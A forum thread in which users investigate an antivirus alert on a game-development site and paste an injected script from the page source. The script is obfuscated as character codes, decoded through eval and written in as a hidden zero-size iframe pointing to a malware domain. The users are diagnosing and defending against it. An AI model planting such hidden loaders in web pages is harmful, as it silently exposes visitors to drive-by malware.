HTML Script Virus Warning
I'm getting a HTML Script Virus warning from my scanner (Avira AntiVir Guard) on GameDev.
It's coming from http://www.kingbaba.cc/ma/news.htm, the script virus is named "HTML/Dldr.Agen.DA.1".
Could you check into that one? I didn't get that warning two hours ago.
Is my scanner crap or is there actually a script virus?
Edit: There's this weird script part in the page source:
<script>
t="60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,107,105,110,103,98,97,98,97,46,99,99,47,109,97,47,105,110,100,101,120,46,104,116,109,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
If you look at the left hand edge of your browser window, under the title, you'll see an IFRAME that links to this url.
I can see it too, how the hell does it install itself? Is it attached to the html code of gamedev.net? Are the servers compromised?
Or is it client-side?
Or is it client-side?
I'm getting a request to run "Microsoft vector graphics rendering (VML)", and my back button isn't working properly either.
This is nuts.
This is nuts.
I'm constantly getting this off and on. It'll get fixed for a while, but seems to eventually reassert itself. Maybe Jack Johnson is targetting the site as a way of stopping video game developers before they even have a chance to make the games that he so vehemently (sp?) opposes. :D
I see it too, the tiny square and code. Very strange.
EDIT:
It does not appear in IE7. It will instead cause the browser to yell at you, asking you if it is okay to run an active x control.
EDIT:
It does not appear in IE7. It will instead cause the browser to yell at you, asking you if it is okay to run an active x control.
I see it too if you drop down on the back button you see a entry for "www.kingbaba.cc" that can't be good. Anybody know what it is trying to install? Has anyone emailed gamedev and asked wtf? I've redirected kingbaba.cc to 127.0.0.1 in my hosts file so hopefully that will over some protection as symatic corp isn't flagging anything.
I see it but it doesn't seem to do anything. (im running firefox though so i don't use ActiveX)
This topic is closed to new replies.
Advertisement
Popular Topics
Advertisement